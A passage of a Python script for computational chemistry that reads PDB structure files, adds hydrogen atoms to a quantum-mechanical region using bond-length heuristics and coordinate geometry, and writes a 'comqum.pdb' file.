Angstroms.\n##39 - 46 Real(8.3) Orthogonal coordinates for Y in Angstroms.\n##47 - 54 Real(8.3) Orthogonal coordinates for Z in Angstroms.\n##55 - 60 Real(6.2) Occupancy.\n##61 - 66 Real(6.2) Temperature factor (Default = 0.0).\n##73 - 76 LString(4) Segment identifier, left-justified.\n##77 - 78 LString(2) Element symbol, right-justified.\n##79 - 80 LString(2) Charge on the atom.\n print(\" read pdb file\")\n read_pdb = open(input_pdb, \"r\")\n org_pdb =[]\n work_pdb =[]\n f_head=False\n head=[]\n for line in read_pdb:\n idef = line[0:6].strip()\n if idef==\"ATOM\" or idef==\"HETATM\":\n f_head=True\n l_pdb=[]\n a_num = int(line[6:11].strip())\n a_name = line[12:16].strip()\n x = float(line[30:38].strip())\n y = float(line[38:46].strip())\n z = float(line[46:54].strip())\n\n l_pdb.append(a_num)\n l_pdb.append(a_name)\n l_pdb.append(x)\n l_pdb.append(y)\n l_pdb.append(z)\n#[0, 1 , 2, 3, 4 \n#[ a_num, a_name, x, y, z\n work_pdb.append(l_pdb)\n print(\"close file:\", input_pdb)\n return work_pdb\n\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\n\ndef atm_to_res(pdb_read):\n# sort pdb in residues\n pdb=[]\n pdb.append([pdb_read[0]])\n for i in range(1,len(pdb_read)):\n if pdb_read[i][6] != pdb_read[i-1][6]:\n# print(len(pdb))\n pdb.append([pdb_read[i]])\n if pdb_read[i][6] == pdb_read[i-1][6]:\n pdb[len(pdb)-1].append(pdb_read[i])\n\n return pdb\n\ndef proto_qm(pdb,atom_qm,f_p):\n# protonates qm system if protons are not existing\n# print(\"protonate syst1\")\n if f_p== False:\n return pdb\n print(\"protonate syst1\")\n for i in range(len(atom_qm)):\n# print(\"protonate syst1\")\n\n# print(atom_qm[i])\n xyz=[atom_qm[i][8],atom_qm[i][9],atom_qm[i][10]]\n# print(xyz)\n ele=atom_qm[i][14]\n# print(ele)\n# print(atom_qm[i])\n if ele==\"C\":\n pdb=prot_c(pdb,xyz,ele,atom_qm[i])\n if ele==\"N\":\n pdb=prot_n(pdb,xyz,ele,atom_qm[i])\n if ele==\"O\":\n pdb=prot_o(pdb,xyz,ele,atom_qm[i])\n return pdb\n\ndef prot_n(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n if 1.5< n_bonds <= 2.5 and len(bond_atom)==2:\n pdb= ad_NH_s(pdb,bond_atom[0],bond_atom[1],atom_qm)\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_NH2(pdb,bond_atom[0],atom_qm)\n return pdb\n return pdb\n\n\ndef ad_NH2(pdb, A2, A3):\n# ad 2H as NH2 group to A3\n# print(\"¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤\")\n r = 1.012\n Ad = 120\n Dd = 180\n Dd1 = 0\n A1=find_A1(pdb,A3,A2) \n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n nam=list(A3[2])\n name = str(nam[0])\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n\n return pdb\n\n\n\n\n\n\n\ndef ad_NH_s(pdb, A1, A2, A3):\n# ad H as NH (SP2) group to A3\n# print(\"atoms treatet\")\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n# print(\"A1\",A1)\n r = 1.032\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n\n# print(\"name1\",name1)\n# print(adH1)\n# print(A3)\n# print(\"next step ad to pdb\")\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n# print(\"addet to pdb\")\n# 
print(\"&&&&&&&&&&&&&&&TEST&&&&&&&&&&&&\")\n return pdb\n\n\ndef prot_o(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n# print(\"atom_qm\",n_bonds,len(bond_atom), atom_qm)\n# if atom_qm[4]==\"HOH\":\n# print(bond_atom)\n if n_bonds >= 2:\n return pdb\n if n_bonds==1 and len(bond_atom)==1:\n pdb=ad_OH(pdb,bond_atom[0],atom_qm)\n if n_bonds==0 and atom_qm[4]==\"HOH\":\n pdb = ad_OH_water(pdb,atom_qm)\n return pdb\n\n\ndef ad_OH_water(pdb,atom_qm):\n## protonates water in direction of posible hydrogen bonds\n print(atom_qm)\n l_vdw=vdw()\n l_h_bonds=find_h_bond(atom_qm,pdb,l_vdw)\n# for i in range(len(l_h_bonds)):\n# print(\"l_h_bonds\",l_h_bonds[i])\n if len(l_h_bonds)>=1:\n# print(\"######################adH1#######################\")\n adH1=find_short_H(atom_qm,l_h_bonds)\n if adH1[0]==0:\n return pdb\n name1 =\"H1\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH1, name1)\n if len(l_h_bonds)>=2: \n# print(\"______________________________adH2_______________________\")\n adH2=find_short_H(atom_qm,l_h_bonds)\n if adH2[0]==0:\n return pdb\n name2 =\"H2\"+atom_qm[2]\n pdb = add_to_pdb(pdb, atom_qm, adH2, name2)\n\n return pdb\n\n\ndef find_short_H(atom_qm,l_h_bonds):\n## finds shortest istace in list of coordinates\n P1=[atom_qm[8],atom_qm[9],atom_qm[10]]\n d_min=1000000\n for i in range(len(l_h_bonds)):\n P2=[l_h_bonds[i][8],l_h_bonds[i][9],l_h_bonds[i][10]]\n dist=CDist2(P1,P2)\n if dist< d_min:\n exist=f_ex_h(pdb, P1, P2)\n# print(\"exist\",exist)\n# if exist == True:\n# print(\"l_h_bonds[i]\",l_h_bonds[i])\n if exist == False:\n d_min=dist\n atom_min=l_h_bonds[i]\n\n P_s=[atom_min[8],atom_min[9],atom_min[10]]\n vec=twoP_to_vec(P1,P_s)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n h_vec=resize_vec(vec,0.98)\n# print(\"len3Dvec(h_vec)\",len3dvec(h_vec))\n \n coord=[P1[0]+h_vec[0],P1[1]+h_vec[1],P1[2]+h_vec[2]]\n if coord == P1:\n coord= [0]\n return coord\n\ndef f_ex_h(pdb, A1, A2):\n#check if hydrogen is positiond in 30 deree to OHO distance\n## false if proton not existing true if existing\n flag=False\n dh=1.5\n max_dist=0.6\n for j in range(len(pdb)):\n for k in range(len(pdb[j])): \n if pdb[j][k][14]==\"H\" or pdb[j][k][14]==\"D\" :\n p0=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n d1= CDist2(A1,p0)\n d2=CDist2(A2,p0)\n ang=CAngle(A1,p0,A2)\n if d1 <= dh or d2 <=dh:\n if 120 <= ang <= 220:\n# print(\"ATOM H\",pdb[j][k])\n# print(\"ang\",ang)\n flag=True\n\n\n return flag\n\n\ndef d_p_to_line(p0,p1,p2):\n## calculate distance between a point0 and a line between p1 and p2\n if (p1[0] == p2[0] and p1[1] == p2[1] and p1[2] == p2[2]):\n d=0\n else:\n if (p2[0]-p1[0] != 0):\n t=-((p1[0]-p0[0])*(p2[0]-p1[0]))/((abs(p2[0]-p1[0]))**2)\n elif (p2[1]-p1[2] != 0 ):\n t=-((p1[1]-p0[1])*(p2[1]-p1[1]))/((abs(p2[1]-p1[1]))**2)\n elif ( p2[2]-p1[2] != 0):\n t=-((p1[2]-p0[2])*(p2[2]-p1[2]))/((abs(p2[2]-p1[2]))**2)\n\n d2=((p1[0]-p0[0])+(p2[0]-p1[0])*t)**2+((p1[1]-p0[1])+(p2[1]-p1[1])*t)**2+((p1[2]-p0[2])+(p2[2]-p1[2])*t)**2\n d=d2**(0.5)\n return d\n\n\n\n\ndef resize_vec(vec,r):\n vec=Normlz(vec)\n# print(\"len3Dvec(vec)\",len3dvec(vec))\n\n new_vec=[vec[0]*r,vec[1]*r,vec[2]*r]\n\n return new_vec\n\ndef find_h_bond(atom_qm,pdb,l_vdw):\n OO=l_vdw[3][1]+l_vdw[3][1]\n ON=l_vdw[3][1]+l_vdw[4][1]\n\n h_bond=[]\n O=[atom_qm[8],atom_qm[9],atom_qm[10]]\n for j in range(len(pdb)):\n for k in range(len(pdb[j])):\n if pdb[j][k][14]==\"O\" or pdb[j][k][14]==\"N\" :\n# print(pdb[k][6],l_water[i][j][6])\n if 
pdb[j][k][6]!=atom_qm[6]:\n acc=[pdb[j][k][8],pdb[j][k][9],pdb[j][k][10]]\n dist=CDist2(O,acc)\n if pdb[j][k][14]==\"O\":\n if dist <= OO:\n h_bond.append(pdb[j][k])\n if pdb[j][k][14]==\"N\":\n if dist <= ON:\n h_bond.append(pdb[j][k])\n\n return h_bond\n\n\ndef vdw():\n l_vdw=[[\"H\",1.20],[\"D\",1.20],[\"C\",1.70],[\"O\",1.52],[\"N\",1.55],[\"CL\",1.75],[\"F\",1.47],[\"BR\",1.85]]\n# h_vdw=1.20\n# c_vdw=1.70\n# o_vdw=1.52\n# n_vdw=1.55\n# s_vdw=1.80\n# cl_vdw= 1.75\n# f_vdw=1.47\n# br_vdw= 1.85\n return l_vdw\n\n\ndef ad_OH(pdb, A2, A3):\n# ad H as OH group to A3\n r = 0.978\n Ad = 106\n Dd = 180\n A1=find_A1(pdb,A3,A2)\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\ndef prot_c(pdb,xyz,ele,atom_qm):\n## identyfy atom pype and protanes it\n bond_atom=f_bond_atoms(pdb,atom_qm)\n\n# print(bond_atom)\n# print(\"xyz###\",xyz)\n n_bonds=def_n_bonds(xyz,ele,bond_atom)\n res_num=atom_qm[6]\n alter=atom_qm[3]\n if n_bonds >= 4:\n return pdb\n if n_bonds==1:\n pdb = ad_CH3(pdb,res_num,alter,bond_atom[0],atom_qm)\n \n if n_bonds<=2.5 and len(bond_atom)==2:\n pdb = ad_CH2(pdb, res_num, alter, bond_atom[0], bond_atom[1], atom_qm) \n if 2.5< n_bonds<= 3.5 and len(bond_atom)==2:\n pdb = ad_CH_ar(pdb, bond_atom[0], bond_atom[1], atom_qm)\n if 2.5< n_bonds<= 3.5 and len(bond_atom)==3:\n pdb = ad_CH_R3(pdb, bond_atom[0], bond_atom[1], atom_qm, bond_atom[2])\n\n# print(\"n_bonds\",ele,n_bonds)\n \n return pdb\n\ndef ad_CH_R3(pdb, A1, A2, A3, A4):\n r = 1.032\n Ad = 109\n Dd = 116\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n A4xyz = [A4[8],A4[9],A4[10]]\n\n adH1 = H_tert(A1xyz, A2xyz, A3xyz, A4xyz,r)\n name1 =\"H\"+A3[2]\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\ndef H_tert(A1, A2, A3, A4,r):\n## set terzier H to A3 in dinstace r\n v1=twoP_to_vec(A3,A1)\n v2=twoP_to_vec(A3,A2)\n v3=twoP_to_vec(A3,A4)\n v_sum=[0,0,0]\n for i in range(len(v_sum)):\n v_sum[i]=-(v1[i]+v2[i]+v3[i])\n\n len_v_sum=len3dvec(v_sum)\n H_vec=[0,0,0]\n for i in range(len(v_sum)):\n H_vec[i]=(r*v_sum[i])/len_v_sum\n H_pos=[0,0,0]\n for i in range(len(H_vec)):\n H_pos[i]=A3[i]+H_vec[i]\n return H_pos\n\n\n\n\ndef ad_CH_ar(pdb, A1, A2, A3):\n# ad H as CH (SP2) group to A3\n r = 1.014\n Ad = 120\n Dd = 180\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n name1 =\"H\"+A3[2]\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n return pdb\n\n\n\n\n\n\n\n\n\ndef ad_CH2(pdb, res_num, alter, A1, A2, A3):\n# ad 2H as CH2 group to A3\n\n r = 1.095\n Ad = 109\n Dd= -121.5\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[1]\n else:\n name = nam[1]+nam[2]\n\n name1 = \"1H\"+name\n name2 = \"2H\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n return pdb\n\ndef ad_CH3(pdb, res_num,alter, A2, A3):\n# ad 3H as CH3 group to A3\n# for alt in range(len(alter)):\n# print(\"alter[alt]\",alter[alt])\n# com = check(pdb,res_num,alter[alt],A1, A2, A3, 1)\n# print(com)\n# if com == False:\n# return pdb\n# print( 
pdb[res_num])\n# print(\"A2\", A2)\n A1=find_A1(pdb,A3,A2)\n# print(\"A1\",A1)\n r = 1.095\n Ad = 109\n Dd = 180\n Dd1 = 60\n A3xyz = [A3[8],A3[9],A3[10]]\n A2xyz = [A2[8],A2[9],A2[10]]\n A1xyz = [A1[8],A1[9],A1[10]]\n adH1 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd)\n adH2 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,Dd1)\n adH3 = ZtoXYZ(A1xyz,A2xyz,A3xyz,r,Ad,-Dd1)\n nam=list(A3[2])\n if len(nam)<=2:\n name=nam[0]\n else:\n name = nam[0]+nam[1]\n\n name1 = \"H1\"+name\n name2 = \"H2\"+name\n name3 = \"H3\"+name\n pdb = add_to_pdb(pdb, A3, adH1, name1)\n pdb = add_to_pdb(pdb, A3, adH2, name2)\n pdb = add_to_pdb(pdb, A3, adH3, name3)\n return pdb\n\ndef add_to_pdb(pdb,old_atm,new_koord,new_nam):\n## ad a new deuterium atom to behind an existing atom in the pdb list\n atom=0\n new_nam=\"H\"\n for i in range(len(pdb)):\n for k in range(len(pdb[i])): \n# print(\"ALT\",alt)\n# atom=0\n# print(pdb[res_num][i][3])\n# print(pdb[res_num][i][2].strip())\n if pdb[i][k][2].strip()==old_atm[2].strip() and\\\n pdb[i][k][3].strip()==old_atm[3].strip() and\\\n pdb[i][k][5].strip()==old_atm[5].strip() and\\\n pdb[i][k][6]==old_atm[6]:\n atom=pdb[i][k]\n indice = k+1\n res_num=i\n\n if atom == 0:\n return pdb\n l_pdb=[]\n l_pdb.append(atom[0])\n l_pdb.append(atom[1])\n l_pdb.append(new_nam)\n l_pdb.append(atom[3])\n l_pdb.append(atom[4])\n l_pdb.append(atom[5])\n l_pdb.append(atom[6])\n l_pdb.append(atom[7])\n l_pdb.append(new_koord[0])\n l_pdb.append(new_koord[1])\n l_pdb.append(new_koord[2])\n l_pdb.append(atom[11])\n l_pdb.append(atom[12])\n l_pdb.append(atom[13])\n l_pdb.append(\"H\")\n l_pdb.append(\" \")\n# print(\"old_atom\",old_atm)\n# print(\"atom\",atom)\n# print(\"l_pdb\",l_pdb)\n# print(\"???????????????????????????????????????????\")\n pdb[res_num].insert(indice, l_pdb)\n# pdb[res_num].append(l_pdb)\n return pdb\n\n\n\ndef find_A1(pdb,A3,A2):\n# find atom bond to A2 to define dihedral to A3\n# print(\"A3\",A3)\n# print(\"A2\",A2)\n bond_atoms=f_bond_atoms(pdb,A2)\n# print(bond_atoms)\n for i in range(len(bond_atoms)):\n if bond_atoms[i][2]!= A3[2]:\n A1=bond_atoms[i]\n\n\n return A1\n\ndef CAngle(x,y,z):\n# calculate angle between a,b,c in degree\n x1=[0,0,0]\n x2=[0,0,0]\n for i in range(len(x)):\n x1[i]=y[i]-x[i]\n x2[i]=y[i]-z[i]\n Cangle=C2Angle(x1,x2)\n return Cangle\ndef C2Angle(x,y):\n#Calculates the angle between x and y\n#Answer in degrees\n #Calculate the angle between x and y\n rtodeg = 57.2957795\n C2angle=(ScalPr(x,y)/(len3dvec(x)*len3dvec(y)))\n# print(\"C2angle=\",C2angle)\n if 0.999999999 <= C2angle <= 1.000000000001 :\n C2angle=0\n elif -0.999999999 >= C2angle >= -1.000000000001:\n C2angle=180\n else:\n C2angle=np.arccos(C2angle)*rtodeg\n return C2angle\ndef ScalPr(x,y):\n#calculate the scalar product\n pro= x[0]*y[0]+x[1]*y[1]+x[2]*y[2]\n return pro\n\n\ndef Cross(x1,x2):\n#Calculates the cross product x3 = x1 x x2\n x3 = [0,0,0]\n x3[0]=x1[1]*x2[2]-x2[1]*x1[2]\n x3[1]=x1[2]*x2[0]-x2[2]*x1[0]\n x3[2]=x1[0]*x2[1]-x2[0]*x1[1]\n return x3\n\ndef Normlz(xyz):\n# Normalise xyz \n temp = 1/len3dvec(xyz)\n for i in range(len(xyz)):\n xyz[i]=xyz[i]*temp\n\n return xyz\ndef ZeroVector():\n## creates ZeroVector\n zerov = np.array([0,0,0])\n return zerov\n\ndef CDihed(x,y,z,w):\n#Calculate the dihedral angle x-y-z-w\n#Answer in degrees between -180 and +180\n #Set v1=y-x, v2=z-y, v3=w-z\n v1=[0,0,0]\n v2=[0,0,0]\n v3=[0,0,0]\n for i in range(3):\n v1[i]=y[i]-x[i]\n v2[i]=z[i]-y[i]\n v3[i]=w[i]-z[i]\n\n #Calculate the normal vectors n1 and n2\n n1=Cross(v1,v2)\n n2=Cross(v2,v3)\n\n #Calculate the torsion 
angle;\n #The sign is determined by the sign of v1.n2\n CDihed=C2Angle(n1,n2)\n if ScalPr(v1,n2) < 0:\n CDihed=-CDihed\n return CDihed\n\n\ndef ZtoXYZ(axyz,bxyz,cxyz,R,Ad,Dd):\n#defines coordinates of 4th atom fro coordinates of 3 atoms distance\n#angel and dihedral \n dxyz = [0,0,0]\n rtodeg = 57.2957795\n\n ## first check if atoms are linear (of yes something is wrong)\n tangle=CAngle(axyz,bxyz,cxyz)\n if abs(tangle)<= 0.1 or 179.9<= abs(tangle) <= 180.0:\n print(\"The atoms are collinear\", tangle)\n sys.exit()\n\n # transforme vrom degree to rad\n A = Ad/rtodeg\n D = Dd/rtodeg\n\n ## Calculate the coordinates in a simple coordinate system\n dxyz[0] = (-R)* np.sin(A)*np.sin(D)\n dxyz[1] = R * np.cos(A)\n dxyz[2] = R * np.sin(A)*np.cos(D)\n b = np.sqrt(CDist2(bxyz,cxyz))\n ab1 = np.sqrt(CDist2(axyz,bxyz))\n ang = CAngle(axyz,bxyz,cxyz)/rtodeg\n a2 = b - np.cos(ang)*ab1\n a3 = np.sin(ang)*ab1\n a1 = 0.0000\n\n ## Now, atom D is transformed into the original coordinate system\n ## 1st rotation\n tv = np.array([0.00, b, 0.00])\n bcv = np.array([bxyz[0]-cxyz[0], bxyz[1]-cxyz[1],bxyz[2]-cxyz[2]])\n rv = Cross(tv, bcv)\n rv = Normlz(rv)\n rv = np.array([rv[0],rv[1],rv[2]])\n zerov = ZeroVector()\n phi = CAngle(tv,zerov,bcv)/rtodeg\n an = [0,0,0]\n an[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*a1+\\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*a2+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*a3\n\n an[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*a1+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*a2+\\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*a3\n\n an[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*a1+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*a2+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*a3\n\n dn = [0,0,0]\n dn[0]=(rv[0]*rv[0]+(1-rv[0])*(1+rv[0])*np.cos(phi))*dxyz[0]+ \\\n (rv[0]*rv[1]*(1-np.cos(phi))-rv[2] *np.sin(phi))*dxyz[1]+\\\n (rv[0]*rv[2]*(1-np.cos(phi))+rv[1] *np.sin(phi))*dxyz[2]\n\n dn[1]=(rv[0]*rv[1]*(1-np.cos(phi))+rv[2] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[1]+(1-rv[1])*(1+rv[1])*np.cos(phi))*dxyz[1]+ \\\n (rv[1]*rv[2]*(1-np.cos(phi))-rv[0] *np.sin(phi))*dxyz[2]\n\n dn[2]=(rv[0]*rv[2]*(1-np.cos(phi))-rv[1] *np.sin(phi))*dxyz[0]+\\\n (rv[1]*rv[2]*(1-np.cos(phi))+rv[0] *np.sin(phi))*dxyz[1]+\\\n (rv[2]*rv[2]+(1-rv[2])*(1+rv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n\n # 2nd rotation\n tv[0]=axyz[0]-cxyz[0]\n tv[1]=axyz[1]-cxyz[1]\n tv[2]=axyz[2]-cxyz[2]\n phi=CDihed(tv,bcv,zerov,an)/rtodeg\n bcv = Normlz(bcv)\n\n dn[0]=(bcv[0]*bcv[0]+(1-bcv[0])*(1+bcv[0])*np.cos(phi))*dxyz[0]+\\\n (bcv[0]*bcv[1]*(1-np.cos(phi))-bcv[2]*np.sin(phi)) *dxyz[1]+\\\n (bcv[0]*bcv[2]*(1-np.cos(phi))+bcv[1]*np.sin(phi)) *dxyz[2]\n\n dn[1]=(bcv[0]*bcv[1]*(1-np.cos(phi))+bcv[2]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[1]+(1-bcv[1])*(1+bcv[1])*np.cos(phi))*dxyz[1]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))-bcv[0]*np.sin(phi)) *dxyz[2]\n\n dn[2]=(bcv[0]*bcv[2]*(1-np.cos(phi))-bcv[1]*np.sin(phi)) *dxyz[0]+\\\n (bcv[1]*bcv[2]*(1-np.cos(phi))+bcv[0]*np.sin(phi)) *dxyz[1]+\\\n (bcv[2]*bcv[2]+(1-bcv[2])*(1+bcv[2])*np.cos(phi))*dxyz[2]\n\n dxyz = [dn[0], dn[1],dn[2]]\n\n #Final translation\n dxyz[0]=dxyz[0]+cxyz[0]\n dxyz[1]=dxyz[1]+cxyz[1]\n dxyz[2]=dxyz[2]+cxyz[2]\n\n\n return dxyz\n\n\n\n\n\n\ndef f_bond_atoms(pdb,atom_qm):\n## find bondet atoms\n bond_atom=[]\n xyz=[atom_qm[8],atom_qm[9],atom_qm[10]]\n bond_atom=[]\n# print(\"xyz&&&\",xyz)\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n 
p2=[pdb[i][k][8],pdb[i][k][9],pdb[i][k][10]]\n dist=CDist2(xyz,p2)\n # print(dist)\n if 0.5< dist< 2:\n# print(dist)\n bond_atom.append(pdb[i][k])\n return bond_atom\n\n\n\ndef def_n_bonds(xyz,ele,bond_atoms):\n# defines how many atoms are bond to the central atom with bond order\n nr_bonds=0\n# print(\"xyz!!!\",xyz)\n for i in range(len(bond_atoms)):\n p2=[bond_atoms[i][8],bond_atoms[i][9],bond_atoms[i][10]]\n dist=CDist2(xyz,p2)\n l_ele=[ele,bond_atoms[i][14]]\n# print(\"dist\",dist)\n if l_ele[0]==\"C\":\n if l_ele[1]==\"C\":\n if 0.5 < dist < 1.25:\n nr_bonds=nr_bonds+3\n if 1.25<= dist <=1.37:\n nr_bonds=nr_bonds+2\n if 1.38<= dist<= 1.47:\n nr_bonds=nr_bonds+1.5\n if 1.48<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"O\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n if 1.33<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"N\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1.5\n if 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"N\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n elif 1.4<= dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.39:\n nr_bonds=nr_bonds+1\n else:\n if 0.5<= dist <=2.5:\n nr_bonds=nr_bonds+1\n\n elif l_ele[0]==\"O\":\n if l_ele[1]==\"C\":\n if 0.5<= dist <=1.32:\n nr_bonds=nr_bonds+2\n elif 1.32 < dist:\n nr_bonds=nr_bonds+1\n elif l_ele[1]==\"H\":\n if 0.5<= dist <=1.29:\n nr_bonds=nr_bonds+1\n else:\n if 1.55< dist <=2.5:\n nr_bonds=nr_bonds+1\n if 0.5<= dist <= 1.55:\n nr_bonds=nr_bonds+2\n\n return nr_bonds\n\n\n\ndef CDist2(A,B):\n#calculate distance betweenn two points\n dist = len3dvec(twoP_to_vec(A, B))\n return dist\n\n\n\ndef len3dvec(vec):\n## calculates lengh of a 3D vecor\n## input as list\n a = np.sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)\n return a\n\ndef twoP_to_vec(A,B):\n#creates vector between two points\n vec = np.array([B[0]-A[0], B[1]-A[1], B[2]-A[2]])\n\n return vec\n\n\ndef renumber_pdb(pdb):\n#renumbers pdb\n num=0\n for i in range(len(pdb)):\n for j in range(len(pdb[i])):\n num=num+1\n pdb[i][j][1]=num\n\n return pdb\n\n\n\ndef write_pdb(pdb,head, output):\n## wite out PDB file\n# res = open(output, \"w\")\n res= open(\"comqum.pdb\",\"w\")\n atm_nr=0\n for i in range(len(head)):\n res.write(head[i])\n# res.write(\"\\n\")\n for i in range(len(pdb)):\n for k in range(len(pdb[i])):\n atm_nr = atm_nr + 1\n string = str('{:6}'.format(pdb[i][k][0]))\n string = string + str('{:5.0f}'.format(atm_nr))\n string = string + \" \"\n string = string + str('{:4s}'.format(str(pdb[i][k][2])))\n# string = string + str('{:1}'.format(pdb[i][k][3]))\n string = string + str('{:3}'.format(pdb[i][k][4]))\n string = string + str('{:>2}'.format(pdb[i][k][5]))\n string = string + str('{:4}'.format(pdb[i][k][6]))\n string = string + str('{:1}'.format(pdb[i][k][7]))\n string = string + \" \"\n string = string + str('{:8.3f}'.format(pdb[i][k][8]))\n string = string + str('{:8.3f}'.format(pdb[i][k][9]))\n string = string + str('{:8.3f}'.format(pdb[i][k][10]))\n string = string + str('{:6.2f}'.format(pdb[i][k][11]))\n string = string + str('{:6.2f}'.format(pdb[i][k][12]))\n string = string + str('{:>7}'.format(pdb[i][k][13]))\n string = string + str('{:>5}'.format(pdb[i][k][14]))\n\n\n string = string + \"\\n\"\n res.write(string)\n res.write(\"END\")\n\n\ndef find_cov(ele):\n# define covalent radius for element)\n cov=cov_rad()\n# print(cov)\n# print(\"ele\",ele)\n ex=False\n for i in 
range(len(cov)):\n if ele==cov[i][0]:\n cov_r=cov[i][1]\n ex=True\n if ex==False:\n print(\"missing covalent radi\", ele)\n return cov_r\n\n\ndef ad_H_no_mm3(mm3,pdb):\n# ad H from pdb to mm3\n nr=0\n nr_ad=0\n nr_ex=0\n for i in range(len(mm3)):\n for j in range(len(mm3[i])):\n# print(\"mm3[i][j][14]\",mm3[i][j][14])\n cov1=find_cov(mm3[i][j][14]) \n# print(\"cov1\",cov1)\n xyz_m=[mm3[i][j][8],mm3[i][j][9],mm3[i][j][10]]\n# xyz_m=[0,0,0]\n for k in range(len(pdb)):\n# print(pdb[k])\n if pdb[k][1]==\"H\":\n cov2=find_cov(pdb[k][1])\n xyz_p=[pdb[k][2],pdb[k][3],pdb[k][4]]\n max_dist=cov1+cov2+0.4\n dist=CDist2(xyz_m,xyz_p)\n# print(dist)\n if dist <= max_dist:\n ext, nr_ex=check_ext(mm3,xyz_p, nr_ex)\n if ext == False:\n trunc,nr=check_trunc(mm3,mm3[i][j],xyz_p,nr)\n# print(\"mm3[i][j]1\",mm3[i][j])\n if trunc==False:\n# print(\"ad H to mm3\")\n mm3 = add_to_pdb(mm3, mm3[i][j], xyz_p, \"H\")\n nr_ad = nr_ad +1\n nr_H=0\n for i in range(len(pdb)):\n if pdb[i][1]==\"H\":\n nr_H=nr_H+1\n print(\"numbre of hydrogen atoms in 